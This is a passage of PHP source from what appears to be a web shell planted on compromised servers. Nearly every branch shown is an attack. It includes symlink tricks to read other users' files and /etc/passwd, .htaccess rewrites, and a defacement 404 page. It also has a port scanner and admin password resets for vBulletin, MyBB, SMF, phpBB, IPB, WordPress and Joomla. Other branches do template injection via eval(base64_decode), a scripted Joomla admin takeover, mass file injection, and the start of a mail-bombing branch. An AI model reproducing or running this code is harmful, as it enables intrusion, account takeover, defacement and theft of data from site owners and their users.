1462 else $file="";
1463
1464 if(empty($file))
1465 exit;
1466
1467 if(!is_writable("."))
1468 echo "not writable directory";
1469
1470 $level=0;
1471
1472 for($as=0;$as<$fakedep;$as++)
1473 {
1474 if(!file_exists($fakedir))
1475 mkdir($fakedir);
1476 chdir($fakedir);
1477 }
1478
1479 while(1<$as--) chdir("..");
1480
1481 $hardstyle = explode("/", $file);
1482
1483 for($a=0;$a<count($hardstyle);$a++)
1484 {
1485 if(!empty($hardstyle[$a]))
1486 {
1487 if(!file_exists($hardstyle[$a]))
1488 mkdir($hardstyle[$a]);
1489 chdir($hardstyle[$a]);
1490 $as++;
1491 }
1492 }
1493 $as++;
1494 while($as--)
1495 chdir("..");
1496
1497 @rmdir("fakesymlink");
1498 @unlink("fakesymlink");
1499
1500 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1501
1502 while(1)
1503 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1504 else $num++;
1505
1506 @unlink("fakesymlink");
1507 mkdir("fakesymlink");
1508
1509 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
1510 }
1511 else
1512 echo '<CENTER>Cannot Create Symlink</CENTER>';
1513}
1514else if(isset($_REQUEST['404new']))
1515{
1516 ?>
1517 <form>
1518 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
1519 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
1520 </br>
1521 </form>
1522 <?php
1523}
1524else if(isset($_REQUEST['404page']))
1525{
1526 $url = $_SERVER['REQUEST_URI'];
1527 $path=explode('/',$url);
1528 $url =str_replace($path[count($path)-1],'',$url);
1529 if(isset($_POST['message']))
1530 {
1531 if($myfile = fopen(".htaccess", "a"))
1532 {
1533 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1534 if($myfilee = fopen("404.html", "w+"))
1535 {
1536 fwrite($myfilee, $_POST['message']);
1537 }
1538 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1539 }
1540 else
1541 echo "<center>Cannot Set 404 Page</center>";
1542 }
1543 else if(strlen($ind) != 0)
1544 {
1545 if($myfile = fopen(".htaccess", "a"))
1546 {
1547 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1548
1549 if($myfilee = fopen("404.html", "w+"))
1550 {
1551 fwrite($myfilee, base64_decode($ind));
1552
1553 fclose($myfilee);
1554 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1555 }
1556 fclose($myfile);
1557 }
1558 else
1559 {
1560 echo "<center>Cannot Set 404 Page</center>";
1561 }
1562 }
1563 else
1564 echo "<center>Nothing Specified in the shell</center>";
1565}
1566else if(isset($_GET["domains"]))
1567{
1568 ?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
1569}
1570else if(isset($_GET["symlink"]))
1571{
1572 $d0mains = @file("/etc/named.conf");
1573 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1574 $path=explode('/',$url);
1575 $url =str_replace($path[count($path)-1],'',$url);
1576 if($d0mains)
1577 {
1578 @mkdir("dhanush",0777);
1579 @chdir("dhanush");
1580 execmd("ln -s / root");
1581 $file3 = 'Options all
1582 DirectoryIndex Sux.html
1583 AddType text/plain .php
1584 AddHandler server-parsed .php
1585 AddType text/plain .html
1586 AddHandler txt .html
1587 Require None
1588 Satisfy Any
1589 ';
1590 $fp3 = fopen('.htaccess','w');
1591 $fw3 = fwrite($fp3,$file3);
1592 @fclose($fp3);
1593 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
1594
1595 $dcount = 1;
1596 foreach($d0mains as $d0main)
1597 {
1598 if(eregi("zone",$d0main))
1599 {
1600 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1601 flush();
1602
1603 if(strlen(trim($domains[1][0])) > 2)
1604 {
1605 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1606
1607 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
1608 $dcount++;
1609 }
1610 }
1611
1612 }
1613 echo "</table>";
1614 }
1615 else
1616 {
1617 if(stristr(php_uname(),"Linux"))
1618 {
1619 ?>
1620 <div style="float:left;position:fixed;">
1621 <form>
1622 <table cellpadding="9">
1623 <tr>
1624 <th colspan="2">Get User Name</th>
1625 </tr>
1626 <tr>
1627 <td>Enter Website Name :</td>
1628 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1629 </tr>
1630 <tr>
1631 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1632 </tr>
1633 <tr>
1634 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1635 </tr>
1636 </table>
1637 </form>
1638 </div>
1639 <?php
1640 $TEST=@file('/etc/passwd');
1641 if ($TEST)
1642 {
1643 @mkdir("dhanush",0777);
1644 @chdir("dhanush");
1645 execmd("ln -s / root");
1646 $file3 = 'Options all
1647 DirectoryIndex Sux.html
1648 AddType text/plain .php
1649 AddHandler server-parsed .php
1650 AddType text/plain .html
1651 AddHandler txt .html
1652 Require None
1653 Satisfy Any
1654 ';
1655 $fp3 = fopen('.htaccess','w');
1656 $fw3 = fwrite($fp3,$file3);
1657 @fclose($fp3);
1658
1659 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1660
1661 $dcount = 1;
1662 $file = fopen("/etc/passwd", "r");
1663 //Output a line of the file until the end is reached
1664 while(!feof($file))
1665 {
1666 $s = fgets($file);
1667 $matches = array();
1668 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1669 $matches = str_replace("home/","",$matches[1]);
1670 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1671 continue;
1672 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1673 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1674 $dcount++;
1675 }
1676 fclose($file);
1677
1678 echo "</table>";
1679 }
1680 else
1681 {
1682 @mkdir("dhanush",0777);
1683 @chdir("dhanush");
1684 execmd("ln -s / root");
1685 $file3 = 'Options all
1686 DirectoryIndex Sux.html
1687 AddType text/plain .php
1688 AddHandler server-parsed .php
1689 AddType text/plain .html
1690 AddHandler txt .html
1691 Require None
1692 Satisfy Any
1693 ';
1694 $fp3 = fopen('.htaccess','w');
1695 $fw3 = fwrite($fp3,$file3);
1696 @fclose($fp3);
1697
1698 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1699
1700 $temp = "";
1701 $val1 = 0;
1702 $val2 = 1000;
1703 for(;$val1 <= $val2;$val1++)
1704 {
1705 $uid = @posix_getpwuid($val1);
1706 if ($uid)
1707 $temp .= join(':',$uid)."\n";
1708 }
1709 echo '<br/>';
1710 $temp = trim($temp);
1711
1712 $file5 = fopen("test.txt","w");
1713 fputs($file5,$temp);
1714 fclose($file5);
1715
1716 $dcount = 1;
1717 $file = fopen("test.txt", "r");
1718 while(!feof($file))
1719 {
1720 $s = fgets($file);
1721 $matches = array();
1722 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1723 $matches = str_replace("home/","",$matches[1]);
1724 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1725 continue;
1726 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1727 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1728 $dcount++;
1729 }
1730 fclose($file);
1731 echo "</table>";
1732 unlink("test.txt");
1733 }
1734 }
1735 else
1736 echo "<center><font size=4 >Cannot create Symlink</font></center>";
1737 }
1738}
1739else if(isset($_GET['host']) && isset($_GET['protocol']))
1740{
1741 echo "Open Ports: ";
1742 $host = $_GET['host'];
1743 $proto = $_GET['protocol'];
1744 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
1745 for($current = 0; $current <= 23; $current++)
1746 {
1747 $currents = $myports[$current];
1748 $service = getservbyport($currents, $proto);
1749 // Try to connect to port
1750 $result = fsockopen($host, $currents, $errno, $errstr, 1);
1751 // Show results
1752 if($result)
1753 echo "<font class=txt>$currents, </font>";
1754 }
1755}
1756else if(isset($_REQUEST['forumpass']))
1757{
1758 $localhost = $_GET['f1'];
1759 $database = $_GET['f2'];
1760 $username = $_GET['f3'];
1761 $password = $_GET['f4'];
1762 $prefix = $_GET['prefix'];
1763 $newpass = $_GET['newpass'];
1764 $uid = $_GET['uid'];
1765
1766 if($_GET['forums'] == "vb")
1767 {
1768 $newpass = $_GET['newipbpass'];
1769 $uid = $_GET['ipbuid'];
1770 $con = mysql_connect($localhost,$username,$password);
1771 $db = mysql_select_db($database,$con);
1772 $salt = "eghjghrtd";
1773 $newpassword = md5(md5($newpass) . $salt);
1774 if($prefix == "" || $prefix == null)
1775 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1776 else
1777 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1778 if($sql)
1779 {
1780 mysql_close($con);
1781 echo "<font class=txt>Password Changed Successfully</font>";
1782 }
1783 else
1784 echo "Cannot Change Password";
1785 }
1786 else if($_GET['forums'] == "mybb")
1787 {
1788 $newpass = $_GET['newipbpass'];
1789 $uid = $_GET['ipbuid'];
1790 $con = mysql_connect($localhost,$username,$password);
1791 $db = mysql_select_db($database,$con);
1792 $salt = "jeghj";
1793 $newpassword = md5(md5($salt).md5($newpass));
1794 if($prefix == "" || $prefix == null)
1795 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1796 else
1797 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1798 if($sql)
1799 {
1800 mysql_close($con);
1801 echo "<font class=txt>Password Changed Successfully</font>";
1802 }
1803 else
1804 echo "Cannot Change Password";
1805 }
1806 else if($_GET['forums'] == "smf")
1807 {
1808 $newpass = $_GET['newipbpass'];
1809 $uid = $_GET['ipbuid'];
1810 $con = mysql_connect($localhost,$username,$password);
1811 $db = mysql_select_db($database,$con);
1812
1813 if($prefix == "" || $prefix == null)
1814 {
1815 $result = mysql_query("select member_name from smf_members where id_member = $uid");
1816 $row = mysql_fetch_array($result);
1817 $membername = $row['member_name'];
1818 $newpassword = sha1(strtolower($membername).$newpass);
1819 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1820 }
1821 else
1822
1823 {
1824 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
1825 $row = mysql_fetch_array($result);
1826 $membername = $row['member_name'];
1827 $newpassword = sha1(strtolower($membername).$newpass);
1828 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1829 }
1830 if($sql)
1831 {
1832 mysql_close($con);
1833 echo "<font class=txt>Password Changed Successfully</font>";
1834 }
1835 else
1836 echo "Cannot Change Password";
1837 }
1838 else if($_GET['forums'] == "phpbb")
1839 {
1840 $newpass = $_POST['newipbpass'];
1841 $uid = $_POST['ipbuid'];
1842 $con = mysql_connect($localhost,$username,$password);
1843 $db = mysql_select_db($database,$con);
1844
1845 $newpassword = md5($newpass);
1846 if(empty($prefix) || $prefix == null)
1847 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
1848 else
1849 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1850 if($sql)
1851 {
1852 mysql_close($con);
1853 echo "<font class=txt>Password Changed Successfully</font>";
1854 }
1855 else
1856 echo "Cannot Change Password";
1857 }
1858 else if($_GET['forums'] == "ipb")
1859 {
1860 $newpass = $_POST['newipbpass'];
1861 $uid = $_POST['ipbuid'];
1862 $con = mysql_connect($localhost,$username,$password);
1863 $db = mysql_select_db($database,$con);
1864 $salt = "eghj";
1865 $newpassword = md5(md5($salt).md5($newpass));
1866 if($prefix == "" || $prefix == null)
1867 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1868 else
1869 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1870 if($sql)
1871 {
1872 mysql_close($con);
1873 echo "<font class=txt>Password Changed Successfully</font>";
1874 }
1875 else
1876 echo "Cannot Change Password";
1877 }
1878 else if($_GET['forums'] == "wp")
1879 {
1880 $uname = $_GET['uname'];
1881 $con = mysql_connect($localhost,$username,$password);
1882 $db = mysql_select_db($database,$con);
1883
1884 $newpassword = md5($newpass);
1885 if($prefix == "" || $prefix == null)
1886 $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1887 else
1888 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1889 if($sql)
1890 {
1891 mysql_close($con);
1892 echo "<font class=txt>Password Changed Successfully</font>";
1893 }
1894 else
1895 echo "Cannot Change Password";
1896 }
1897 else if($_GET['forums'] == "joomla")
1898 {
1899 $newjoomlapass = $_GET['newjoomlapass'];
1900 $joomlauname = $_GET['username'];
1901 $con = mysql_connect($localhost,$username,$password);
1902 $db = mysql_select_db($database,$con);
1903
1904 $newpassword = md5($newjoomlapass);
1905 if($prefix == "" || $prefix == null)
1906 $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
1907 else
1908 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
1909 if($sql)
1910 {
1911 mysql_close($con);
1912 echo "<font class=txt>Password Changed Successfully</font>";
1913 }
1914 else
1915 echo "Cannot Change Password";
1916 }
1917}
1918else if(isset($_POST['forumdeface']))
1919{
1920 $localhost = $_POST['f1'];
1921 $database = $_POST['f2'];
1922 $username = $_POST['f3'];
1923 $password = $_POST['f4'];
1924 $index = $_POST['index'];
1925 $prefix = $_POST['tableprefix'];
1926
1927 if($_POST['forumdeface'] == "vb")
1928 {
1929 $con =@ mysql_connect($localhost,$username,$password);
1930 $db =@ mysql_select_db($database,$con);
1931 $index=str_replace('"','\\"',$index);
1932 $attack = "{\${eval(base64_decode(\'";
1933 $attack .= base64_encode("echo \"$index\";");
1934 $attack .= "\'))}}{\${exit()}}</textarea>";
1935 if($prefix == "" || $prefix == null)
1936 $query = "UPDATE template SET template = '$attack'";
1937 else
1938 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1939 $result =@ mysql_query($query,$con);
1940 if($result)
1941 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
1942 else
1943 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
1944 }
1945 else if($_POST['forumdeface'] == "mybb")
1946 {
1947 $con =@ mysql_connect($localhost,$username,$password);
1948 $db =@ mysql_select_db($database,$con);
1949 $attack = "{\${eval(base64_decode(\'";
1950 $attack .= base64_encode("echo \"$index\";");
1951 $attack .= "\'))}}{\${exit()}}</textarea>";
1952 $attack = str_replace('"',"\\'",$attack);
1953
1954 if($prefix == "" || $prefix == null)
1955 $query = "UPDATE mybb_templates SET template = '$attack'";
1956 else
1957 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
1958 $result =@ mysql_query($query,$con);
1959 if($result)
1960 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
1961 else
1962 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
1963 }
1964 else if($_POST['forumdeface'] == "smf")
1965 {
1966 $head = $_POST['head'];
1967 $catid = $_POST['f5'];
1968
1969 $con =@ mysql_connect($localhost,$username,$password);
1970 $db =@ mysql_select_db($database,$con);
1971 if($prefix == "" || $prefix == null)
1972 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1973 else
1974 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1975 $result =@ mysql_query($query,$con);
1976 if($result)
1977 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
1978 else
1979 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
1980 }
1981 else if($_POST['forumdeface'] == "ipb")
1982 {
1983 $head = $_POST['head'];
1984 $catid = $_POST['f5'];
1985
1986 $IPB = "forums";
1987 $con =@ mysql_connect($localhost,$username,$password);
1988 $db =@ mysql_select_db($database,$con);
1989 if($prefix == "" || $prefix == null)
1990 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
1991 else
1992 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
1993 if($result)
1994 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
1995 else
1996 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
1997 }
1998 else if($_POST['forumdeface'] == "wp")
1999 {
2000 $catid = $_POST['f5'];
2001 $head = $_POST['head'];
2002
2003 $con =@ mysql_connect($localhost,$username,$password);
2004 $db =@ mysql_select_db($database,$con);
2005 if($prefix == "" || $prefix == null)
2006 {
2007 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2008 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
2009 else
2010 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2011 }
2012 else
2013 {
2014 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2015 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
2016 else
2017 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2018
2019 }
2020 $result =@mysql_query($query,$con) or mysql_error();
2021 if($result)
2022 echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
2023 else
2024 echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
2025 }
2026 else if($_POST['forumdeface'] == "joomla")
2027 {
2028 $site_url = $_POST['siteurl'];
2029 $dbprefix = $_POST['tableprefix'];
2030 $dbname = $_POST['f2'];
2031 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2032
2033 function randomt()
2034 {
2035 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2036 srand((double)microtime()*1000000);
2037 $i = 0;
2038 $pass = '' ;
2039
2040 while ($i <= 7)
2041 {
2042 $num = rand() % 33;
2043 $tmp = substr($chars, $num, 1);
2044 $pass = $pass . $tmp;
2045 $i++;
2046 }
2047
2048 return $pass;
2049 }
2050 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
2051 {
2052 $ar0=explode($marqueurDebutLien, $text);
2053 $ar1=explode($marqueurFinLien, $ar0[$i]);
2054 $ar=trim($ar1[0]);
2055 return $ar;
2056 }
2057 $co=randomt();
2058
2059 $link=mysql_connect($localhost,$username,$password) ;
2060 mysql_select_db($dbname,$link);
2061
2062 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2063
2064 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2065
2066 if ( $req )
2067 {
2068 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2069 $data = mysql_fetch_array($req);
2070 $template_name=$data["template"];
2071
2072 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2073 $data = mysql_fetch_array($req);
2074 $template_id=$data["extension_id"];
2075
2076 $url2=$site_url."/index.php";
2077
2078 $ch = curl_init();
2079 curl_setopt($ch, CURLOPT_URL, $url2);
2080 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2081 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2082 curl_setopt($ch, CURLOPT_HEADER, 1);
2083 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2084 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2085 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2086
2087
2088 $buffer = curl_exec($ch);
2089
2090 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2091 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2092
2093
2094 $url2=$site_url."/index.php";
2095 $ch = curl_init();
2096 curl_setopt($ch, CURLOPT_URL, $url2);
2097 curl_setopt($ch, CURLOPT_POST, 1);
2098 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
2099 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2100 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2101 curl_setopt($ch, CURLOPT_HEADER, 0);
2102 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2103 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2104 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2105 $buffer = curl_exec($ch);
2106
2107 $pos = strpos($buffer,"com_config");
2108 if($pos === false)
2109 {
2110 echo("<br>[-] Login Error");
2111 exit;
2112 }
2113
2114 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2115 $ch = curl_init();
2116 curl_setopt($ch, CURLOPT_URL, $url2);
2117 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2118 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2119 curl_setopt($ch, CURLOPT_HEADER, 0);
2120 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2121 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2122
2123 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2124 $buffer = curl_exec($ch);
2125
2126 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2127 if(!$hidden2)
2128 {
2129 echo("<br>[-] index.php Not found in Theme Editor");
2130 exit;
2131 }
2132
2133 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2134
2135 $ch = curl_init();
2136 curl_setopt($ch, CURLOPT_URL, $url2);
2137 curl_setopt($ch, CURLOPT_POST, 1);
2138 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2139
2140 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2141 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2142 curl_setopt($ch, CURLOPT_HEADER, 0);
2143 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2144 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2145 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2146 $buffer = curl_exec($ch);
2147
2148 $pos = strpos($buffer,'<dd class="message message">');
2149 if($pos === false)
2150 {
2151 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2152 }
2153 else
2154 {
2155 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2156 }
2157 }
2158 else
2159 {
2160 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2161 $data = mysql_fetch_array($req);
2162 $template_name=$data["template"];
2163
2164 $url2=$site_url."/index.php";
2165 $ch = curl_init();
2166 curl_setopt($ch, CURLOPT_URL, $url2);
2167 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2168 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2169 curl_setopt($ch, CURLOPT_HEADER, 1);
2170 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2171 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2172 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2173 $buffer = curl_exec($ch);
2174
2175 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2176
2177 $url2=$site_url."/index.php";
2178 $ch = curl_init();
2179 curl_setopt($ch, CURLOPT_URL, $url2);
2180 curl_setopt($ch, CURLOPT_POST, 1);
2181 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2182 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2183 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2184 curl_setopt($ch, CURLOPT_HEADER, 0);
2185 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2186 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2187 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2188 $buffer = curl_exec($ch);
2189
2190 $pos = strpos($buffer,"com_config");
2191
2192 if($pos === false)
2193 {
2194 echo("<br>[-] Login Error");
2195 exit;
2196 }
2197
2198 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2199 $ch = curl_init();
2200 curl_setopt($ch, CURLOPT_URL, $url2);
2201 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2202 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2203 curl_setopt($ch, CURLOPT_HEADER, 0);
2204 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2205 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2206 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2207 $buffer = curl_exec($ch);
2208
2209 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2210
2211 if(!$hidden2)
2212 {
2213 echo("<br>[-] index.php Not found in Theme Editor");
2214 }
2215
2216 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2217 $ch = curl_init();
2218 curl_setopt($ch, CURLOPT_URL, $url2);
2219 curl_setopt($ch, CURLOPT_POST, 1);
2220 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2221 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2222 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2223 curl_setopt($ch, CURLOPT_HEADER, 0);
2224 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2225 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2226 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2227 $buffer = curl_exec($ch);
2228
2229 $pos = strpos($buffer,'<dd class="message message fade">');
2230 if($pos === false)
2231 {
2232 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2233 exit;
2234 }
2235 else
2236 {
2237 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2238 }
2239 }
2240 }
2241}
2242else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2243{
2244 $filetype = $_POST['filetype'];
2245
2246 $mode = "a";
2247
2248 if($_POST['mode'] == 'Apender')
2249 $mode = "a";
2250
2251 if($_POST['mode'] == 'Overwriter')
2252 $mode = "w";
2253
2254 if (is_dir($_POST['pathtomass']))
2255 {
2256 $lolinject = $_POST['injectthis'];
2257 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2258 if(substr($_POST['pathtomass'], -1) == "\\")
2259 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2260 foreach (glob($mypath) as $injectj00)
2261 {
2262 if($injectj00 == __FILE__)
2263 continue;
2264 $fp=fopen($injectj00,$mode);
2265 if (fputs($fp,$lolinject))
2266 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2267 else
2268 echo 'failed to inject '.$injectj00.'<br>';
2269 }
2270 }
2271 else
2272 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
2273}
2274else if(isset($_POST['mailfunction']))
2275{
2276 if($_POST['mailfunction'] == "dobombing")
